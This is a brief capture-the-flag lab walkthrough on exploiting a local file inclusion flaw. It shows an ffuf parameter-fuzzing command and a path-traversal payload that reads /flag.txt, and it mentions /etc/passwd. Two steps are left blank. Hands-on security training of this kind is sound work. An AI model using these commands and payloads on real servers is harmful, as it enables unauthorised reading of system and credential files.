Automated Scanning

Fuzz the web application for exposed parameters, then try to exploit it with one of the LFI wordlists to read /flag.txt

Step 1 - Fuzz parameters:

• Use the burp-parameter-names.txt wordlist with the following command:

  • Copy

    ffuf -w burp-parameter-names.txt:FUZZ -u 'http://SERVER_IP:SERVER_PORT/index.php?FUZZ' -fs 2309

Step 2 - Fuzz LFI payloads:

• Use the LFI-Jhaddix.txt wordlist:

Step 3 - Test one of the discovered payloads:

• Append the payload to the application URL:

Step 4 - Get the flag:

• Now simply substitute /etc/passwd for /flag.txt

  • ../../../../../../../../../../../../../../../../../../../../../../flag.txt

And flag found!